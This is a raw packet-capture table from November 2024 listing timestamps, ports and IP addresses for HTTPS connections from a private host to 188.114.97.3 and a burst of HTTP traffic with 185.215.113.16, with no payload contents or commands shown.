Nov 19, 2024 21:02:25.129148006 CET	49761	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:25.129218102 CET	443	49761	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:25.129323006 CET	49761	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:25.129759073 CET	49761	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:25.129775047 CET	443	49761	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:25.602782011 CET	443	49761	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:25.602868080 CET	49761	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:25.604521036 CET	49761	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:25.604532003 CET	443	49761	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:25.604918957 CET	443	49761	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:25.606482029 CET	49761	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:25.606653929 CET	49761	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:25.606683969 CET	443	49761	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:25.606740952 CET	49761	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:25.606749058 CET	443	49761	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:27.098813057 CET	443	49761	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:27.098913908 CET	443	49761	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:27.098979950 CET	49761	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:27.106091976 CET	49761	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:27.106102943 CET	443	49761	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:27.748229980 CET	49778	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:27.748270988 CET	443	49778	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:27.748428106 CET	49778	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:27.748792887 CET	49778	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:27.748809099 CET	443	49778	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:28.212440968 CET	443	49778	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:28.212543964 CET	49778	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:28.214566946 CET	49778	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:28.214580059 CET	443	49778	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:28.214849949 CET	443	49778	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:28.216214895 CET	49778	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:28.216278076 CET	49778	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:28.216284990 CET	443	49778	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:30.481463909 CET	443	49778	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:30.481566906 CET	443	49778	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:30.481640100 CET	49778	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:30.496824980 CET	49778	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:30.496851921 CET	443	49778	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.284717083 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.284758091 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.284900904 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.285289049 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.285306931 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.747190952 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.747288942 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.748965025 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.748972893 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.749353886 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.759205103 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.759972095 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.760006905 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.760129929 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.760176897 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.760304928 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.760373116 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.760559082 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.760592937 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.760853052 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.760891914 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.761060953 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.761106014 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.761117935 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.761127949 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.761265993 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.761296988 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.761318922 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.761451006 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.761492968 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.770318985 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.770494938 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.770536900 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.770567894 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.770620108 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:31.770632982 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:31.775228977 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:35.938460112 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:35.938580990 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:35.938662052 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:35.938875914 CET	49802	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:35.938894987 CET	443	49802	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:35.977545977 CET	49832	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:35.977602005 CET	443	49832	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:35.977713108 CET	49832	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:35.978162050 CET	49832	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:35.978174925 CET	443	49832	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:36.459800959 CET	443	49832	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:36.459980965 CET	49832	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:36.461460114 CET	49832	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:36.461477995 CET	443	49832	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:36.461834908 CET	443	49832	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:36.463066101 CET	49832	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:36.463089943 CET	49832	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:36.463160992 CET	443	49832	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:36.863961935 CET	443	49832	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:36.864064932 CET	443	49832	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:36.864106894 CET	49832	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:36.864257097 CET	49832	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:36.864268064 CET	443	49832	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:36.894778013 CET	49839	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:36.899888039 CET	80	49839	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:36.899983883 CET	49839	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:36.904601097 CET	49839	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:36.909423113 CET	80	49839	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.038978100 CET	49839	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.086335897 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.091523886 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.091620922 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.200905085 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.205881119 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.794797897 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.794825077 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.794840097 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.794852018 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.794862986 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.794873953 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.794876099 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.794884920 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.794908047 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.794929981 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.794977903 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.794989109 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.795001030 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.795032024 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.795047045 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.882626057 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.882694960 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.882889032 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.928090096 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.928129911 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.928142071 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.928181887 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.928209066 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.928220987 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.928270102 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.928514957 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.928565025 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.928632021 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.928644896 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.928656101 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.928668976 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.928674936 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.928710938 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.931045055 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.931521893 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.931535959 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.931571007 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.931813955 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.931828976 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.931858063 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.933100939 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.933177948 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.933235884 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.933247089 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.933263063 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.933274031 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.933280945 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:37.933284998 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:37.933342934 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.010874987 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.010893106 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.010906935 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.010989904 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.053790092 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.053833008 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.053843021 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.053957939 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.053968906 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.054035902 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.054045916 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.054089069 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.054413080 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.054445028 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.054454088 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.054492950 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.054702997 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.054769993 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.054929972 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.054974079 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.054991007 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.055005074 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.055037022 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.055079937 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.055116892 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.055597067 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.055665016 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.055675983 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.055706978 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.055789948 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.055802107 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.055840015 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.056411028 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.056447029 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.056478977 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.056489944 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.056529999 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.056592941 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.056605101 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.056643963 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.057301044 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.057382107 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.057394028 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.057427883 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.057455063 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.057472944 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.057509899 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.058159113 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.058221102 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.058232069 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.058231115 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.058260918 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.058347940 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.058358908 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.058398008 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.059026003 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.097774982 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.097817898 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.097831011 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.097932100 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.098040104 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.098051071 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.098187923 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.140765905 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.140808105 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.140819073 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.140831947 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.140844107 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.140990973 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.141011953 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.141015053 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.141037941 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.141098022 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.141149998 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.141172886 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.141184092 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.141217947 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.183712006 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.183799028 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.183823109 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.183847904 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.183871031 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.183882952 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.183924913 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.183943987 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.183965921 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.183989048 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.184010029 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.184032917 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.184252024 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.184336901 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.184350967 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.184371948 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.184489012 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.184503078 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.184518099 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.184530973 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.184535027 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.184568882 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.184979916 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185049057 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185059071 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185096025 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.185121059 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185302973 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185343027 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.185372114 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185384035 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185426950 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.185611963 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185627937 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185638905 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185650110 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185657978 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.185678005 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.185949087 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185960054 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.185996056 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.186285973 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.186331987 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.186342955 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.186377048 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.186460018 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.186470032 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.186481953 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.186502934 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.186518908 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.186778069 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.186789036 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.186800003 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.186815977 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.187249899 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.187309980 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.187326908 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.187347889 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.187374115 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.187468052 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.187478065 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.187489033 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.187500954 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.187515974 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.187536955 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.187669039 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.187680960 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.187716007 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.188237906 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.188287973 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.188298941 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.188333035 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.188411951 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.188422918 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.188433886 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.188446045 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.188462019 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.188473940 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.188669920 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.188683987 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.188700914 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.189203978 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.189255953 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.189268112 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.189300060 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.189409971 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.189419985 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.189430952 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.189444065 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.189460039 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.189471960 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.189526081 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.189552069 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.190171003 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.190213919 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.227783918 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.227849007 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.227863073 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.227927923 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.227941036 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.227965117 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.228007078 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.228023052 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.228024006 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.228037119 CET	80	49840	185.215.113.16	192.168.2.7
